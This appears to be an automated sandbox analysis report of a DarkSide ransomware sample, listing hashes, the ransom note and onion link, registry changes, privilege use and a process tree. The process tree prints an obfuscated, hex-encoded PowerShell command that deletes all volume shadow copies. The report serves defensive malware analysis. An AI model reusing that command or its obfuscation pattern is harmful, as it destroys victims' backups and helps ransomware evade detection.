Overview
overview
10Static
static
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
10Ransomware...KB.exe
windows7-x64
10Ransomware...KB.exe
windows10-2004-x64
7Resubmissions
28-07-2024 16:38
240728-t5tryssgmm 1007-07-2024 14:07
240707-rfgd8atekm 1007-07-2024 14:07
240707-re689awdpe 1013-09-2022 17:54
220913-wg1lpsgbg7 10Analysis
-
max time kernel
1560s -
max time network
1578s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
07-07-2024 14:07
Static task
static1
Behavioral task
behavioral1
Sample
RansomwareSamples/Avaddon_09_06_2020_1054KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
RansomwareSamples/Avaddon_09_06_2020_1054KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
RansomwareSamples/Avos_18_07_2021_403KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
RansomwareSamples/Avos_18_07_2021_403KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral5
Sample
RansomwareSamples/Babik_04_01_2021_31KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
RansomwareSamples/Babik_04_01_2021_31KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral7
Sample
RansomwareSamples/Babuk_20_04_2021_79KB.exe
Resource
win7-20240508-en
Behavioral task
behavioral8
Sample
RansomwareSamples/Babuk_20_04_2021_79KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral9
Sample
RansomwareSamples/BlackKingdom_23_03_2021_12460KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
RansomwareSamples/BlackKingdom_23_03_2021_12460KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral11
Sample
RansomwareSamples/BlackMatter_02_08_2021_67KB.exe
Resource
win7-20240508-en
Behavioral task
behavioral12
Sample
RansomwareSamples/BlackMatter_02_08_2021_67KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral13
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral14
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral15
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral17
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral18
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral19
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral20
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral21
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral22
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral23
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral24
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral25
Sample
RansomwareSamples/Hades_29_03_2021_1909KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral26
Sample
RansomwareSamples/Hades_29_03_2021_1909KB.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral27
Sample
RansomwareSamples/Hive_17_07_2021_808KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral28
Sample
RansomwareSamples/Hive_17_07_2021_808KB.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral29
Sample
RansomwareSamples/LockBit_14_02_2021_146KB.exe
Resource
win7-20240705-en
Behavioral task
behavioral30
Sample
RansomwareSamples/LockBit_14_02_2021_146KB.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral31
Sample
RansomwareSamples/MAKOP_27_10_2020_115KB.exe
Resource
win7-20240704-en
Behavioral task
behavioral32
Sample
RansomwareSamples/MAKOP_27_10_2020_115KB.exe
Resource
win10v2004-20240704-en
General
-
Target
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
-
SSDEEP
768:lXnIczxCbTRNl71wHpZQgYI1TQPB3aYJEOW:hIMxCXd1+pZQgYIxk3vJE
Malware Config
Extracted
C:\Users\Admin\README.f0e1586e.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (153) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral17/memory/2380-0-0x0000000001350000-0x0000000001367000-memory.dmp upx behavioral17/memory/2380-47-0x0000000001350000-0x0000000001367000-memory.dmp upx behavioral17/memory/2380-188-0x0000000001350000-0x0000000001367000-memory.dmp upx behavioral17/memory/2380-241-0x0000000001350000-0x0000000001367000-memory.dmp upx behavioral17/memory/2380-280-0x0000000001350000-0x0000000001367000-memory.dmp upx -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
DarkSide_01_05_2021_30KB.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f0e1586e.BMP" DarkSide_01_05_2021_30KB.exe Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f0e1586e.BMP" DarkSide_01_05_2021_30KB.exe -
Modifies Control Panel 1 IoCs
Processes:
DarkSide_01_05_2021_30KB.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallpaperStyle = "10" DarkSide_01_05_2021_30KB.exe -
Modifies registry class 5 IoCs
Processes:
DarkSide_01_05_2021_30KB.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e DarkSide_01_05_2021_30KB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f0e1586e.ico" DarkSide_01_05_2021_30KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e DarkSide_01_05_2021_30KB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e\ = "f0e1586e" DarkSide_01_05_2021_30KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon DarkSide_01_05_2021_30KB.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeDarkSide_01_05_2021_30KB.exepid process 1760 powershell.exe 2380 DarkSide_01_05_2021_30KB.exe 2380 DarkSide_01_05_2021_30KB.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
DarkSide_01_05_2021_30KB.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeSecurityPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeTakeOwnershipPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeLoadDriverPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeSystemProfilePrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeSystemtimePrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeProfSingleProcessPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeIncBasePriorityPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeCreatePagefilePrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeBackupPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeRestorePrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeShutdownPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeDebugPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeSystemEnvironmentPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeRemoteShutdownPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeUndockPrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: SeManageVolumePrivilege 2380 DarkSide_01_05_2021_30KB.exe Token: 33 2380 DarkSide_01_05_2021_30KB.exe Token: 34 2380 DarkSide_01_05_2021_30KB.exe Token: 35 2380 DarkSide_01_05_2021_30KB.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeBackupPrivilege 852 vssvc.exe Token: SeRestorePrivilege 852 vssvc.exe Token: SeAuditPrivilege 852 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
DarkSide_01_05_2021_30KB.exedescription pid process target process PID 2380 wrote to memory of 1760 2380 DarkSide_01_05_2021_30KB.exe powershell.exe PID 2380 wrote to memory of 1760 2380 DarkSide_01_05_2021_30KB.exe powershell.exe PID 2380 wrote to memory of 1760 2380 DarkSide_01_05_2021_30KB.exe powershell.exe PID 2380 wrote to memory of 1760 2380 DarkSide_01_05_2021_30KB.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:852
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56c03245d5980669fa8dcb0bb5136d217
SHA1c675715811352edf59bcb7c9204f0640d8330e81
SHA256d9dbb21c063fc20d970eee5ede2df22b3544ab8e1fb49946639d0db814016feb
SHA512964fe4f7d273d549d51279024839b0e617211c9db0049231bb92119357d0bee83b50a8b09424b886fe515e7b53f08cddb57672261d2aa9649d36f6a388a0e23b
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD591a207778ee0970b4289a281bc319e08
SHA17af869acec9a13181b41df5014599d0e0494f1ed
SHA2561ced3b518f4d7b84f40fcd894713af12a97ae9732cabee15b35944b10593d224
SHA512ee6613e6e10a06269720b6ce25e271751d45327b11b7cde4fab5161dc8e41105ba8161f8f91c98f66440800ad19a6e189219f6328b5427f24913357fe8dda4ca
-
Filesize
1KB
MD5f418a249405444da33cc73b402a26306
SHA11a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf